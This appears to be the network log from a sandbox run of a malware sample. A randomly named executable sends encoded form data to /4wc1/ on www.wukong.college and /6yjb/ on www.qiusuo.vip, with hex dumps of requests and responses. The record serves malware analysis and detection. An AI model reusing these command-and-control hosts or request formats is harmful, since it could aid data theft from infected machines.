Nov 12, 2024 15:30:09.030860901 CET	773	OUT	POST /4wc1/ HTTP/1.1 Host: www.wukong.college Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.wukong.college Referer: http://www.wukong.college/4wc1/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 37 71 50 33 67 37 70 48 59 74 33 35 41 37 52 4e 41 4e 64 41 63 5a 38 34 48 50 77 48 33 30 39 58 36 38 66 41 75 7a 44 63 6a 6a 71 4e 4b 4d 6f 6b 2b 38 4b 59 50 62 58 49 74 30 4b 44 6e 74 50 49 75 4f 75 35 47 2f 63 61 63 79 57 66 6f 2b 39 47 54 63 49 57 55 54 4b 76 6f 38 46 65 4a 47 39 41 57 47 79 62 69 42 63 6f 44 47 4f 51 62 5a 68 63 70 4e 49 68 33 52 7a 4f 2b 6b 5a 72 4a 6f 49 6a 37 37 37 44 34 38 4f 50 41 6c 51 4d 38 4c 52 62 4a 51 51 53 30 68 54 35 4a 31 4e 41 33 52 75 51 68 55 41 6d 71 4e 44 38 2b 30 55 77 77 66 4a 32 48 30 59 61 76 38 59 79 4b 79 44 4b 79 76 7a 59 57 35 4a 56 2f 6f 74 75 33 4d 39 6e 47 61 33 46 4e 54 35 72 56 4f 38 3d Data Ascii: mRu=7qP3g7pHYt35A7RNANdAcZ84HPwH309X68fAuzDcjjqNKMok+8KYPbXIt0KDntPIuOu5G/cacyWfo+9GTcIWUTKvo8FeJG9AWGybiBcoDGOQbZhcpNIh3RzO+kZrJoIj777D48OPAlQM8LRbJQQS0hT5J1NA3RuQhUAmqND8+0UwwfJ2H0Yav8YyKyDKyvzYW5JV/otu3M9nGa3FNT5rVO8=
Nov 12, 2024 15:30:09.348335981 CET	389	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:30:09 GMT Server: Apache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 178 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00 Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+\|OX)@OG>Wr~b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	49722	47.52.221.8	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:30:11.890522957 CET	2578	OUT	POST /4wc1/ HTTP/1.1 Host: www.wukong.college Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.wukong.college Referer: http://www.wukong.college/4wc1/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 37 71 50 33 67 37 70 48 59 74 33 35 41 37 52 4e 41 4e 64 41 63 5a 38 34 48 50 77 48 33 30 39 58 36 38 66 41 75 7a 44 63 6a 6a 69 4e 4c 36 38 6b 73 4d 32 59 4f 62 58 49 6e 55 4b 41 6e 74 50 52 75 50 47 39 47 2f 68 6c 63 30 61 66 70 63 31 47 48 39 49 57 44 6a 4b 76 71 38 46 66 4e 47 39 56 57 47 69 66 69 42 4d 6f 44 47 4f 51 62 61 70 63 67 38 49 68 37 78 7a 4e 37 6b 5a 76 59 59 49 4c 37 37 69 32 34 38 61 31 48 57 49 4d 2f 72 68 62 45 43 49 53 34 68 54 2f 61 46 4d 66 33 52 53 50 68 55 64 58 71 4d 6e 61 2b 7a 49 77 36 65 30 68 55 48 77 43 78 50 38 45 47 42 72 67 35 50 54 50 65 37 52 76 76 34 68 61 77 4b 35 72 46 70 71 4e 57 44 52 49 4d 4c 35 6a 46 2f 35 67 74 43 54 36 7a 5a 34 36 62 54 48 53 4e 69 4c 32 6b 41 61 78 76 4f 68 42 37 63 57 2b 6f 4c 4e 58 2b 6b 6a 4a 30 78 42 42 70 67 36 6b 41 34 41 61 4a 7a 34 59 6e 32 46 39 36 2f 71 75 76 74 66 4d 63 6d 61 59 76 44 62 4a 61 4f 37 4b 6a 63 6a 2f 4f 30 72 2b 37 2f 75 36 43 5a 34 55 52 33 36 66 46 54 32 69 5a 41 31 76 32 43 4d 39 70 30 64 53 4d 6f [TRUNCATED] Data Ascii: mRu=7qP3g7pHYt35A7RNANdAcZ84HPwH309X68fAuzDcjjiNL68ksM2YObXInUKAntPRuPG9G/hlc0afpc1GH9IWDjKvq8FfNG9VWGifiBMoDGOQbapcg8Ih7xzN7kZvYYIL77i248a1HWIM/rhbECIS4hT/aFMf3RSPhUdXqMna+zIw6e0hUHwCxP8EGBrg5PTPe7Rvv4hawK5rFpqNWDRIML5jF/5gtCT6zZ46bTHSNiL2kAaxvOhB7cW+oLNX+kjJ0xBBpg6kA4AaJz4Yn2F96/quvtfMcmaYvDbJaO7Kjcj/O0r+7/u6CZ4UR36fFT2iZA1v2CM9p0dSMo3Td2dRorgOsidURgvc3Qrhl7C0EYMJS5u1iAiwtsV4QbYcp2g+0g3fvSIBFWPkcGpuERIRUCT6+UhvctNHpCNUPTW4mDPAre+/aWP+BBTq2NcC2Ky4HW8XpGcZn8CPyZUL1deHk+wHsUtUGxVXEhQl4f7brxRP2l9OsGKQ1Foypm68boFymbuAXYRUbA/3vEdVKgulJCXCCV2fcunNNkKi12Amxgy1yc2ehLj22oIilpCStcJogY4HwMcQ2DQtNxpMlTOLfI+0q3ath1w+iRlEG2433/z+TVtqXL97uV0qUbnAOiIXSJBWhXdH3h1fHpQohXBMEivLa3erFbliubcu4m27B9YmW3xW1IuAAFDcc4DOBlAySU4uTXereOGGfCoPsXXhPwthl9rQHqwWQ2DnObW/8fURj7U/9ZBrRnwIkVnMPFTnqJswcreWnWltpLYX/6aUX7i/9LVU9Oe4Ph8vpzrEEICMUPjje0KYInHLGXGbKmdyFnqlk1qR5a0JzRTWO7zISkN5jf6r3Xa49aJgKntk3cag1Wt76cE/6XYtv7kxbrU7ihOHmNj+c92ll0Eqak2KZ8z+zOf0OjDipqxisB+80l91OoGsuqFKlSb7nfpCxyDceMVwffSTYEdEhsOcDurKfGXSvgj09wqFQAzAxIdJgDozL/t0 [TRUNCATED]
Nov 12, 2024 15:30:11.890587091 CET	5344	OUT	Data Raw: 58 66 6b 53 69 34 56 54 57 6b 4d 53 6c 59 4b 66 4c 30 61 2f 6b 4c 72 62 58 30 78 43 4b 73 63 61 76 4a 2f 64 6a 39 51 6b 78 2b 52 6d 30 43 53 78 6a 35 4b 4f 51 58 71 44 59 47 71 41 2b 58 68 36 44 7a 67 4c 31 68 6c 45 31 67 72 4e 69 74 65 71 65 76 Data Ascii: XfkSi4VTWkMSlYKfL0a/kLrbX0xCKscavJ/dj9Qkx+Rm0CSxj5KOQXqDYGqA+Xh6DzgL1hlE1grNiteqevvcmmrLjrCwxTwTrK0aKHpWiCAwY0B9AfAlR5I2gZaOWR/Jib/AOdehgsncFhG3YzRcJpLFgF//VJTcFeSrrgd2pS9dXUxgO0uvJ4a+FTuY2JFIGY2zrEPpuO5lq9HlY5GlrUyrFVCbgA5jGilDWDXzfOcFoQlUCa+
Nov 12, 2024 15:30:12.210099936 CET	389	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:30:12 GMT Server: Apache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 178 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00 Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+\|OX)@OG>Wr~b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.20	49723	47.52.221.8	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:30:14.756283045 CET	477	OUT	GET /4wc1/?mRu=2onXjOgtXs7bFrsmBuZreqMXUphshRxX5MKbqzS42irGFJYns6q4JN3vt1eB5PqznJS/LdYYFyeg3ON9AeFtKxD4o+R2FH9zSHG9zjVrST6RS49i0a4KyRw=&UJ=7H1XM HTTP/1.1 Host: www.wukong.college Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:30:15.088499069 CET	390	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:30:14 GMT Server: Apache Vary: Accept-Encoding Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 34 77 63 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /4wc1/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.20	49724	154.38.64.6	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:30:21.153552055 CET	741	OUT	POST /6yjb/ HTTP/1.1 Host: www.qiusuo.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.qiusuo.vip Referer: http://www.qiusuo.vip/6yjb/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 59 61 6c 54 53 47 57 50 4f 35 39 7a 32 59 64 57 52 49 74 6a 69 38 78 78 31 6f 42 44 68 43 50 52 48 42 37 4c 47 49 34 65 6d 38 53 69 4a 4d 49 54 66 69 37 6a 55 33 42 5a 79 71 72 35 70 4c 77 33 52 64 58 41 70 6d 6e 30 32 4a 57 4e 34 65 4f 47 52 67 53 70 45 36 41 7a 79 31 62 4f 30 6a 54 4a 4a 57 73 49 45 72 35 78 73 6f 30 39 64 2f 30 61 51 54 73 69 4a 59 36 6c 5a 4d 6d 73 39 61 54 32 72 66 58 66 55 6b 53 78 46 4a 4c 4c 41 38 74 6c 63 2f 73 63 37 36 50 35 30 56 35 72 2b 73 32 46 64 4f 6d 67 78 64 71 6e 33 79 61 72 64 77 43 7a 34 55 57 68 39 78 78 36 53 42 61 6f 61 73 32 6f 44 67 3d 3d Data Ascii: mRu=YalTSGWPO59z2YdWRItji8xx1oBDhCPRHB7LGI4em8SiJMITfi7jU3BZyqr5pLw3RdXApmn02JWN4eOGRgSpE6Azy1bO0jTJJWsIEr5xso09d/0aQTsiJY6lZMms9aT2rfXfUkSxFJLLA8tlc/sc76P50V5r+s2FdOmgxdqn3yardwCz4UWh9xx6SBaoas2oDg==
Nov 12, 2024 15:30:21.474091053 CET	535	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 12 Nov 2024 14:30:21 GMT Content-Type: text/html; charset=utf-8 Content-Length: 337 Connection: close Content-Encoding: gzip Vary: Accept-Encoding Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00 Data Ascii: 1o0w~oKU!TQ:!'UP@D2ll2'%!$mj$+8e^ fm6Rvl)J@N_W%Jrx\|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x\|$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.20	49725	154.38.64.6	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:30:24.009607077 CET	761	OUT	POST /6yjb/ HTTP/1.1 Host: www.qiusuo.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.qiusuo.vip Referer: http://www.qiusuo.vip/6yjb/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 59 61 6c 54 53 47 57 50 4f 35 39 7a 33 37 31 57 51 75 6c 6a 75 4d 78 79 70 34 42 44 33 79 50 4b 48 42 2f 4c 47 4e 64 54 6d 4b 69 69 4a 73 59 54 63 6a 37 6a 54 33 42 5a 35 4b 72 38 71 37 78 37 52 61 65 31 70 6e 62 30 32 49 79 4e 34 66 2b 47 52 58 4f 71 47 71 41 31 36 56 62 4d 33 54 54 4a 4a 57 73 49 45 72 73 73 73 73 51 39 64 4e 67 61 53 79 73 6a 58 49 36 6b 61 4d 6d 73 35 61 54 79 72 66 58 74 55 6c 4f 62 46 50 48 4c 41 39 64 6c 64 72 34 64 31 4b 50 37 36 31 34 75 79 4a 71 42 61 76 47 79 31 74 79 58 37 79 57 4e 56 47 50 70 6c 6d 69 46 2b 69 74 49 57 78 6a 41 59 75 33 7a 65 68 39 45 45 33 42 70 6f 36 48 75 63 6e 4b 76 39 38 38 50 68 73 4d 3d Data Ascii: mRu=YalTSGWPO59z371WQuljuMxyp4BD3yPKHB/LGNdTmKiiJsYTcj7jT3BZ5Kr8q7x7Rae1pnb02IyN4f+GRXOqGqA16VbM3TTJJWsIErssssQ9dNgaSysjXI6kaMms5aTyrfXtUlObFPHLA9dldr4d1KP7614uyJqBavGy1tyX7yWNVGPplmiF+itIWxjAYu3zeh9EE3Bpo6HucnKv988PhsM=
Nov 12, 2024 15:30:24.331356049 CET	535	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 12 Nov 2024 14:30:24 GMT Content-Type: text/html; charset=utf-8 Content-Length: 337 Connection: close Content-Encoding: gzip Vary: Accept-Encoding Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00 Data Ascii: 1o0w~oKU!TQ:!'UP@D2ll2'%!$mj$+8e^ fm6Rvl)J@N_W%Jrx\|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x\|$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.20	49726	154.38.64.6	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:30:26.861804962 CET	7910	OUT	POST /6yjb/ HTTP/1.1 Host: www.qiusuo.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.qiusuo.vip Referer: http://www.qiusuo.vip/6yjb/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 59 61 6c 54 53 47 57 50 4f 35 39 7a 33 37 31 57 51 75 6c 6a 75 4d 78 79 70 34 42 44 33 79 50 4b 48 42 2f 4c 47 4e 64 54 6d 4a 43 69 4a 61 55 54 65 41 54 6a 53 33 42 5a 77 71 72 39 71 37 77 68 52 63 32 35 70 6e 57 42 32 4b 36 4e 71 4a 4b 47 41 31 6d 71 4d 71 41 31 32 31 62 4a 30 6a 54 59 4a 57 38 55 45 72 38 73 73 73 51 39 64 4d 51 61 56 6a 73 6a 56 49 36 6c 5a 4d 6e 74 39 61 54 4b 72 66 66 39 55 6c 4b 68 46 66 6e 4c 4f 39 4e 6c 62 65 73 64 7a 61 50 39 33 56 34 49 79 4a 76 66 61 76 61 55 31 74 33 34 37 7a 4f 4e 52 51 4c 2f 69 47 79 73 73 6a 5a 78 5a 44 62 47 61 63 72 2b 62 69 70 69 46 47 39 6f 67 73 66 6d 41 30 6d 50 75 2b 38 37 67 35 42 6f 78 53 6f 53 63 4c 38 72 48 45 75 63 5a 59 5a 62 38 74 4f 45 62 32 34 46 42 58 4f 4a 6a 39 53 36 72 58 45 59 62 4e 6e 66 37 38 34 33 6c 6f 79 61 7a 52 62 72 31 6c 68 32 77 6b 32 37 44 44 62 6c 51 39 39 2b 5a 66 54 49 48 70 37 70 72 47 7a 31 6b 6b 54 70 69 6c 6a 41 5a 52 6b 79 44 37 6b 63 67 46 51 57 79 64 73 48 48 59 59 72 32 42 33 65 43 6a 52 2b 4e 69 [TRUNCATED] Data Ascii: mRu=YalTSGWPO59z371WQuljuMxyp4BD3yPKHB/LGNdTmJCiJaUTeATjS3BZwqr9q7whRc25pnWB2K6NqJKGA1mqMqA121bJ0jTYJW8UEr8sssQ9dMQaVjsjVI6lZMnt9aTKrff9UlKhFfnLO9NlbesdzaP93V4IyJvfavaU1t347zONRQL/iGyssjZxZDbGacr+bipiFG9ogsfmA0mPu+87g5BoxSoScL8rHEucZYZb8tOEb24FBXOJj9S6rXEYbNnf7843loyazRbr1lh2wk27DDblQ99+ZfTIHp7prGz1kkTpiljAZRkyD7kcgFQWydsHHYYr2B3eCjR+Ni83FdbmV4mYy+pBNxpNuPg7x+4IA7rKyZH+4muRaJgjBsJI4Iv+fHIrYx6wCutM//4bZXsos78r0N45Ihb0Sqt96mJBOqysK91ZiSoe8QGsVRM4BqgoUaRp5u27ogxgsUMbxf3NpbE6jQduZ+8UmMYG24iCC+hOpQ5yyX+mo3KGZprC8Ah468ELUryB1Jks4diQrtWBCaGL+pzVSzpOql1DVChXDhWsEX3RALyEFZFT+tzB0aH0n/ImLDSGGcMF2piu0LxV58M58xeaZxxCbKi1bPWmLRA6qLE21CySuhh5QPU49Gy9aZgtglGjY1r8+ozmzQFHgquV+wEPmh+HVhgOXWdBsrMx7/G/yxnwX1U+rZ6UpFtk7RV1x+4fLYj/0DvpXyq0v2fyXKcSQAl3jo361WfpV3s8FECryjUt8Ww2q+gR+KvqQooS71KFExVB9VY8vHoTf+XrjkUUP0uI9CbabRjqTF6100YnA7MnwAPQwwYGPNJ+7dKyXik5f5UYu+WMN9u86KzfO51gIjOpa9mEHDw553cQN1bnSH/YCLneVLQVxmLyY2Szps4bQelxUaMxg38QwhRuWXnDztSKCMhh8hvR2lO8mnWil+dF1QsAQvfCGSrbtvIHFkX9Pcyba7rQ9XvXMgFqZvaR9gcB2fOjODyFMtZZYAUm [TRUNCATED]
Nov 12, 2024 15:30:27.179158926 CET	535	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 12 Nov 2024 14:30:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 337 Connection: close Content-Encoding: gzip Vary: Accept-Encoding Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00 Data Ascii: 1o0w~oKU!TQ:!'UP@D2ll2'%!$mj$+8e^ fm6Rvl)J@N_W%Jrx\|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x\|$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.11.20	49727	154.38.64.6	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:30:29.708959103 CET	473	OUT	GET /6yjb/?mRu=VYNzRxyQK7JD7ZohbYVagv51ruE2l0awbhfoJPQ4rqLtN/pKU1ruR3BE6r+8vb9gac3NpWXxvYS6rs+3SUr3GMlMxkDr3AnCXH8/Zbk4o49navQqKFljaLg=&UJ=7H1XM HTTP/1.1 Host: www.qiusuo.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
